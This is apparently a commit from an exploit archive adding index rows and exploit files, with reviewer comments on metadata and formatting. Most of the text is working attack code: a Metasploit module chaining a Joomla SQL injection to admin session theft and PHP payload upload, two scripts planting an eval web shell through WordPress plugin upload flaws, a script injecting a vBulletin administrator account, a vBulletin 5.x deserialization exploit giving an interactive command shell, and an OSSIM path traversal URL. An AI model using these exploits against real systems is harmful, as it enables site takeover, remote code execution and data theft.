DB: 2015-11-24
16 new exploits
parent 24fd1d1765
commit daf16b0803
17 changed files with 913 additions and 0 deletions
16
files.csv
|
@ -35045,8 +35045,24 @@ id,file,description,date,author,platform,type,port
|
|||
38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
|
||||
38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
|
||||
38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
|
||||
38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-03,wantexz,php,webapps,0
|
||||
38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
|
||||
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
|
||||
38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0
|
||||
38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0
|
||||
38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
|
||||
38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-07,wantexz,php,webapps,0
|
||||
38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) 'timestamp' Parameter Directory Traversal Vulnerability",2013-10-08,"Ding Yu-Chi",php,webapps,0
|
||||
38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x '/install/upgrade.php' Security Bypass Vulnerability",2013-10-13,"Joshua Rogers",php,webapps,0
|
||||
38786,platforms/php/webapps/38786.txt,"Ziteman CMS Login Page SQL Injection Vulnerability",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability 2",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza",php,webapps,80
|
||||
38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash PoC",2015-11-23,"Antonio Z.",windows,dos,0
|
||||
38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
|
||||
38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38794,platforms/windows/dos/38794.txt,"Windows Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38796,platforms/windows/dos/38796.txt,"Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80
|
||||
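Review bot: The rows for 38788 and 38789 carry the same title, "Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability", told apart only by a trailing " 2", so a search of files.csv cannot tell them apart. The two text files in this commit give different CVE ids (CVE-2015-4877 and CVE-2015-4878); putting each id in its title would fix that. In the same hunk, 38782 sits between 38781 and 38775, so the rows are not in id order, and the author of 38781 and 38784 is spelled two ways ("Yu-Chi Ding" and "Ding Yu-Chi").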
|
|
|
267
platforms/php/remote/38797.rb
Executable file
|
@ -0,0 +1,267 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Joomla Content History SQLi Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits a SQL injection vulnerability found in Joomla versions
|
||||
3.2 up to 3.4.4. The vulnerability exists in the Content History administrator
|
||||
component in the core of Joomla. Triggering the SQL injection makes it possible
|
||||
to retrieve active Super User sessions. The cookie can be used to login to the
|
||||
Joomla administrator backend. By creating a new template file containing our
|
||||
payload, remote code execution is made possible.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Asaf Orpani', # Vulnerability discovery
|
||||
'xistence <xistence[at]0x90.nl>' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2015-7857' ], # Admin session hijacking
|
||||
[ 'CVE', '2015-7297' ], # SQLi
|
||||
[ 'CVE', '2015-7857' ], # SQLi
|
||||
[ 'CVE', '2015-7858' ], # SQLi
|
||||
[ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/' ],
|
||||
[ 'URL', 'http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
# Arbitrary big number. The payload gets sent as POST data, so
|
||||
# really it's unlimited
|
||||
'Space' => 262144, # 256k
|
||||
},
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Joomla 3.x <= 3.4.4', {} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Oct 23 2015",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
# Request using a non-existing table
|
||||
res = sqli(rand_text_alphanumeric(rand(10)+6))
|
||||
|
||||
if res && res.body =~ /`(.*)_ucm_history`/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
||||
end
|
||||
|
||||
|
||||
def sqli( tableprefix )
|
||||
|
||||
# SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
|
||||
# The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
|
||||
# This way we make sure that's excluded and we only get real admin sessions.
|
||||
|
||||
sql = " (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM #{tableprefix}session WHERE data LIKE '%Super User%' AND data NOT LIKE '%IS NOT NULL%' AND userid!='0' AND username IS NOT NULL LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
|
||||
|
||||
# Retrieve cookies
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "index.php"),
|
||||
'vars_get' => {
|
||||
'option' => 'com_contenthistory',
|
||||
'view' => 'history',
|
||||
'list[ordering]' => '',
|
||||
'item_id' => '1',
|
||||
'type_id' => '1',
|
||||
'list[select]' => sql
|
||||
}
|
||||
})
|
||||
|
||||
return res
|
||||
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
# Request using a non-existing table first, to retrieve the table prefix
|
||||
res = sqli(rand_text_alphanumeric(rand(10)+6))
|
||||
|
||||
if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/
|
||||
table_prefix = $1
|
||||
print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
|
||||
end
|
||||
|
||||
# Retrieve the admin session using our retrieved table prefix
|
||||
res = sqli("#{table_prefix}_")
|
||||
|
||||
if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/
|
||||
auth_cookie_part = $1[0...-1]
|
||||
print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!")
|
||||
end
|
||||
|
||||
# Retrieve cookies
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php")
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
|
||||
cookie_begin = $1
|
||||
print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
|
||||
end
|
||||
|
||||
# Modify cookie to authenticated admin
|
||||
auth_cookie = cookie_begin
|
||||
auth_cookie << "="
|
||||
auth_cookie << auth_cookie_part
|
||||
auth_cookie << ";"
|
||||
|
||||
# Authenticated session
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Administration - Control Panel/
|
||||
print_status("#{peer} - Successfully authenticated as Administrator")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Session failure")
|
||||
end
|
||||
|
||||
|
||||
# Retrieve template view
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
'view' => 'templates'
|
||||
}
|
||||
})
|
||||
|
||||
# We try to retrieve and store the first template found
|
||||
if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&view=template&id=([0-9]+)&file=([a-zA-Z0-9=]+)/
|
||||
template_id = $1
|
||||
file_id = $2
|
||||
else
|
||||
fail_with(Failure::Unknown, "Unable to retrieve template")
|
||||
end
|
||||
|
||||
filename = rand_text_alphanumeric(rand(10)+6)
|
||||
|
||||
# Create file
|
||||
print_status("#{peer} - Creating file [ #{filename}.php ]")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
'task' => 'template.createFile',
|
||||
'id' => template_id,
|
||||
'file' => file_id,
|
||||
},
|
||||
'vars_post' => {
|
||||
'type' => 'php',
|
||||
'name' => filename
|
||||
}
|
||||
})
|
||||
|
||||
# Grab token
|
||||
if res && res.code == 303 && res.headers['Location']
|
||||
location = res.headers['Location']
|
||||
print_status("#{peer} - Following redirect to [ #{location} ]")
|
||||
res = send_request_cgi(
|
||||
'uri' => location,
|
||||
'method' => 'GET',
|
||||
'cookie' => auth_cookie
|
||||
)
|
||||
|
||||
# Retrieving template token
|
||||
if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/
|
||||
token = $1
|
||||
print_status("#{peer} - Token [ #{token} ] retrieved")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
|
||||
end
|
||||
|
||||
if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
|
||||
template_path = $1
|
||||
print_status("#{peer} - Template path [ #{template_path} ] retrieved")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
|
||||
end
|
||||
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Creating file failed")
|
||||
end
|
||||
|
||||
filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
|
||||
|
||||
# Inject payload data into file
|
||||
print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
|
||||
'cookie' => auth_cookie,
|
||||
'vars_get' => {
|
||||
'option' => 'com_templates',
|
||||
'view' => 'template',
|
||||
'id' => template_id,
|
||||
'file' => filename_base64,
|
||||
},
|
||||
'vars_post' => {
|
||||
'jform[source]' => payload.encoded,
|
||||
'task' => 'template.apply',
|
||||
token => '1',
|
||||
'jform[extension_id]' => template_id,
|
||||
'jform[filename]' => "/#{filename}.php"
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
|
||||
print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
|
||||
end
|
||||
|
||||
# Request payload
|
||||
register_files_for_cleanup("#{filename}.php")
|
||||
print_status("#{peer} - Executing payload")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
|
||||
'cookie' => auth_cookie
|
||||
})
|
||||
|
||||
end
|
||||
|
||||
end
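Review bot: 'References' lists [ 'CVE', '2015-7857' ] twice, once commented "Admin session hijacking" and once "SQLi", so one of the two entries is either redundant or carries the wrong id; drop the duplicate or correct it so the module metadata maps cleanly to the advisories. The affected range is also stated two ways, "3.2 up to 3.4.4" in 'Description' and 'Joomla 3.x <= 3.4.4' in 'Targets'; the target name should use the narrower range the description gives.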
|
62
platforms/php/webapps/38782.php
Executable file
|
@ -0,0 +1,62 @@
|
|||
source: http://www.securityfocus.com/bid/62825/info
|
||||
|
||||
The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
|
||||
|
||||
<?php
|
||||
|
||||
# seo-watcher ~ Exploit
|
||||
# http://indonesiancoder.com/
|
||||
|
||||
|
||||
echo <<<EOT
|
||||
|
||||
|
||||
EOT;
|
||||
|
||||
|
||||
$options = getopt('u:f:');
|
||||
|
||||
if(!isset($options['u'], $options['f']))
|
||||
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
|
||||
-u http://target.com/ The full path to Joomla!
|
||||
-f shell.php The name of the file to create.\n");
|
||||
|
||||
$url = $options['u'];
|
||||
$file = $options['f'];
|
||||
|
||||
|
||||
$shell = "{$url}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}";
|
||||
$url = "{$url}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}";
|
||||
|
||||
$data = "<?php eval(\$_GET['cmd']); ?>";
|
||||
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
|
||||
'Content-Type: text/plain');
|
||||
|
||||
|
||||
echo " [+] Submitting request to: {$options['u']}\n";
|
||||
|
||||
|
||||
$handle = curl_init();
|
||||
|
||||
curl_setopt($handle, CURLOPT_URL, $url);
|
||||
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
|
||||
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
|
||||
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
|
||||
|
||||
$source = curl_exec($handle);
|
||||
curl_close($handle);
|
||||
|
||||
|
||||
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
|
||||
{
|
||||
echo " [+] Exploit completed successfully!\n";
|
||||
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
die(" [+] Exploit was unsuccessful.\n");
|
||||
}
|
||||
|
||||
?>
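Review bot: The usage text in the die() call describes -u as "The full path to Joomla!" and names the script IDC.php, but the header and both request paths (wp-content/plugins/seo-watcher/...) are for a WordPress plugin, so the help text is wrong for this entry; it should name WordPress and this file. The header also gives no affected plugin version or fix, only the SecurityFocus BID link, which leaves a reader unable to tell whether an installed copy is affected.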
|
64
platforms/php/webapps/38783.php
Executable file
|
@ -0,0 +1,64 @@
|
|||
source: http://www.securityfocus.com/bid/62876/info
|
||||
|
||||
The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
|
||||
|
||||
<?php
|
||||
|
||||
# woopra plugins ~ Exploit
|
||||
# http://indonesiancoder.com/
|
||||
#
|
||||
|
||||
echo <<<EOT
|
||||
|
||||
EOT;
|
||||
|
||||
|
||||
$options = getopt('u:f:');
|
||||
|
||||
if(!isset($options['u'], $options['f']))
|
||||
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
|
||||
-u http://target.com/ The full path to Joomla!
|
||||
-f shell.php The name of the file to create.\n");
|
||||
|
||||
$url = $options['u'];
|
||||
$file = $options['f'];
|
||||
|
||||
|
||||
$shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
|
||||
$url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
|
||||
|
||||
$data = "<?php eval(\$_GET['cmd']); ?>";
|
||||
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
|
||||
rv:15.0) Gecko/20100101 Firefox/15.0.1',
|
||||
'Content-Type: text/plain');
|
||||
|
||||
|
||||
echo " [+] Submitting request to: {$options['u']}\n";
|
||||
|
||||
|
||||
$handle = curl_init();
|
||||
|
||||
curl_setopt($handle, CURLOPT_URL, $url);
|
||||
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
|
||||
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
|
||||
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
|
||||
|
||||
$source = curl_exec($handle);
|
||||
curl_close($handle);
|
||||
|
||||
|
||||
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') &&
|
||||
@fopen($shell, 'r'))
|
||||
{
|
||||
echo " [+] Exploit completed successfully!\n";
|
||||
echo " ______________________________________________\n\n
|
||||
{$shell}?cmd=system('id');\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
die(" [+] Exploit was unsuccessful.\n");
|
||||
}
|
||||
|
||||
?>
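Review bot: Two string literals in this file are wrapped mid-string: the User-Agent entry in $headers is split before "rv:15.0", and the final echo is split before {$shell}, so each now contains a raw newline that the 38782.php copy of the same code does not have. Rejoin each onto one line. The usage text has the same "The full path to Joomla!" wording as 38782.php although this entry is for the WordPress Woopra plugin, and $shell is built with "{$url}//wp-content" while the next line uses a single slash.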
|
9
platforms/php/webapps/38784.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/62899/info
|
||||
|
||||
Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
|
||||
|
||||
Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim
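Review bot: The text says OSSIM 4.3.3 is vulnerable, but the files.csv title added for 38784 in this commit carries no version, so the index entry cannot be filtered by release; add "4.3.3" to the title. The file also names no author, although files.csv credits "Ding Yu-Chi", and gives no fixed version or workaround.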
|
142
platforms/php/webapps/38785.pl
Executable file
|
@ -0,0 +1,142 @@
|
|||
source: http://www.securityfocus.com/bid/62909/info
|
||||
|
||||
vBulletin is prone to a security-bypass vulnerability.
|
||||
|
||||
Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions.
|
||||
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Title: vBulletin remote admin injection exploit
|
||||
# Author: Simo Ben youssef
|
||||
# Contact: Simo_at_Morxploit_com
|
||||
# Coded: 17 September 2013
|
||||
# Published: 24 October 2013
|
||||
# MorXploit Research
|
||||
# http://www.MorXploit.com
|
||||
#
|
||||
# Vendor: vBulletin (www.vbulletin.com)
|
||||
# Version: 4.1.x / 5.x.x
|
||||
# Vulnerability: Remote admin injection
|
||||
# Severity: High
|
||||
# Status: Confirmed
|
||||
#
|
||||
# Exploit code description:
|
||||
# Perl code to inject a new admin account through upgrade.php script.
|
||||
#
|
||||
# Vulnerability details:
|
||||
# upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading
|
||||
# it only requires the customer number which can be extracted through the same script source code.
|
||||
#
|
||||
# Fix:
|
||||
# Rename or delete the install folder until a fix is released.
|
||||
#
|
||||
# Author disclaimer:
|
||||
# The information contained in this entire document is for educational, demonstration and testing purposes only.
|
||||
# Author cannot be held responsible for any malicious use. Use at your own risk.
|
||||
#
|
||||
# Exploit usage:
|
||||
#
|
||||
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
|
||||
#
|
||||
# ===================================================
|
||||
# --- vbulletin admin injection exploit
|
||||
# --- By: Simo Ben youssef <simo_at_morxploit_com>
|
||||
# --- MorXploit Research www.MorXploit.com
|
||||
# ===================================================
|
||||
# [*] Trying to get customer number ... hold on!
|
||||
# [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
|
||||
# [*] Trying to MorXploit localhost ... hold on!
|
||||
# [+] Admin account successfully injected!
|
||||
# [+] Admin: MorXploit
|
||||
# [+] Pass: m0rxpl017
|
||||
|
||||
use strict;
|
||||
use IO::Socket;
|
||||
|
||||
if(!defined($ARGV[0])) {
|
||||
|
||||
system ('clear');
|
||||
print "\n";
|
||||
print "===================================================\n";
|
||||
print "--- vbulletin admin injection exploit\n";
|
||||
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
|
||||
print "--- MorXploit Research www.MorXploit.com\n";
|
||||
print "===================================================\n";
|
||||
|
||||
print "--- Usage: perl $0 target\n\n";
|
||||
exit; }
|
||||
|
||||
my $site = $ARGV[0];
|
||||
|
||||
##### Change these as needed #####
|
||||
my $user = "MorXploit";
|
||||
my $passwd = "m0rxpl017";
|
||||
my $email = "dev%40null.com";
|
||||
my $path = "/install/upgrade.php";
|
||||
##################################
|
||||
|
||||
my $accept = "Accept: */*";
|
||||
my $ct = "application/x-www-form-urlencoded";
|
||||
my $port = "80";
|
||||
|
||||
system ('clear');
|
||||
print "\n";
|
||||
print "===================================================\n";
|
||||
print "--- vbulletin admin injection exploit\n";
|
||||
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
|
||||
print "--- MorXploit Research www.MorXploit.com\n";
|
||||
print "===================================================\n";
|
||||
|
||||
my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
|
||||
|
||||
print "[*] Trying to get customer number ... hold on!\n";
|
||||
|
||||
print $sock "GET $path HTTP/1.1\n";
|
||||
print $sock "Host: $site\n";
|
||||
print $sock "$accept\n";
|
||||
print $sock "Content-Type: $ct\n";
|
||||
print $sock "Connection: Close\n\n";
|
||||
|
||||
my $gotcn;
|
||||
while(my $cn = <$sock>) {
|
||||
if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
|
||||
$gotcn = $1;
|
||||
}
|
||||
}
|
||||
|
||||
if (!defined $gotcn) {
|
||||
print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
|
||||
}
|
||||
else {
|
||||
print "[+] Got $gotcn!\n";
|
||||
}
|
||||
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
|
||||
&only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
|
||||
htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
|
||||
a[confirmpassword]=$passwd&htmldata[email]=$email";
|
||||
my $cl = length($xploit);
|
||||
my $content = "Content-Length: $cl";
|
||||
|
||||
my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
|
||||
|
||||
print "[*] Trying to MorXploit $site ... hold on!\n";
|
||||
|
||||
print $sock2 "POST $path HTTP/1.1\n";
|
||||
print $sock2 "Host: $site\n";
|
||||
print $sock2 "$accept\n";
|
||||
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
|
||||
print $sock2 "Content-Length: $cl\n";
|
||||
print $sock2 "Content-Type: $ct\n";
|
||||
print $sock2 "Connection: Close\n\n";
|
||||
print $sock2 "$xploit\n\n";
|
||||
|
||||
while(my $result = <$sock2>){
|
||||
if ($result =~ /Administrator account created/) {
|
||||
print "[+] Admin account successfully injected!\n";
|
||||
print "[+] Admin: $user\n";
|
||||
print "[+] Pass: $passwd\n";
|
||||
exit;
|
||||
}
|
||||
}
|
||||
print "[-] Failed, something went wrong\n";
|
||||
exit;
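Review bot: The script header credits "Simo Ben youssef", lists versions "4.1.x / 5.x.x" and a publication date of 24 October 2013, while the files.csv row for 38785 credits "Joshua Rogers", titles it "vBulletin 4.1.x" and dates it 2013-10-13; the two records should be reconciled. Separately, the die after the second IO::Socket::INET call tests $sock rather than $sock2, so a failed second connection is not reported. The "Fix:" comment (rename or delete the install folder) is the only mitigation on the page and is worth repeating in the prose header above the script.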
|
7
platforms/php/webapps/38786.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/62949/info
|
||||
|
||||
Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/admincss/default.asp
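Review bot: The only URL given is /admincss/default.asp, an ASP page, yet the file is stored under platforms/php/webapps and files.csv lists the platform as php; the platform field should be checked against the product. The text also never names the parameter or form field that reaches the SQL query, or an affected version, so the entry says less than its files.csv title ("Login Page SQL Injection").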
|
47
platforms/php/webapps/38790.pl
Executable file
|
@ -0,0 +1,47 @@
|
|||
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
|
||||
#[+] Product: vbulletin
|
||||
#[+] Vendor: http://vbulletin.com
|
||||
#[+] Vulnerable Version(s): Vbulletin 5.x
|
||||
#
|
||||
#
|
||||
# Author : Mohammad Reza Espargham
|
||||
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||
# Website : www.reza.es
|
||||
# Twitter : https://twitter.com/rezesp
|
||||
# FaceBook : https://www.facebook.com/reza.espargham
|
||||
# Special Thanks : Mohammad Emad
|
||||
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
||||
|
||||
use LWP::UserAgent;
|
||||
use LWP::Simple;
|
||||
$ua = LWP::UserAgent ->new;
|
||||
|
||||
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
|
||||
print "\n\n \t Enter Target : ";
|
||||
$Target=<STDIN>;
|
||||
chomp($Target);
|
||||
|
||||
|
||||
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}');
|
||||
|
||||
$source=$response->decoded_content;
|
||||
if (($source =~ m/4276158464/i))
|
||||
{
|
||||
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}');
|
||||
$user=$response->decoded_content;
|
||||
chomp($user);
|
||||
print "\n Target Vulnerable ;)\n";
|
||||
while($cmd=="exit")
|
||||
{
|
||||
print "\n\n$user\$ ";
|
||||
$cmd=<STDIN>;
|
||||
chomp($cmd);
|
||||
if($cmd =~ m/exit/i){exit 0;}
|
||||
$len=length($cmd);
|
||||
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}');
|
||||
print "\n".$response->decoded_content;
|
||||
|
||||
}
|
||||
}else{print "\ntarget is not Vulnerable\n\n"}
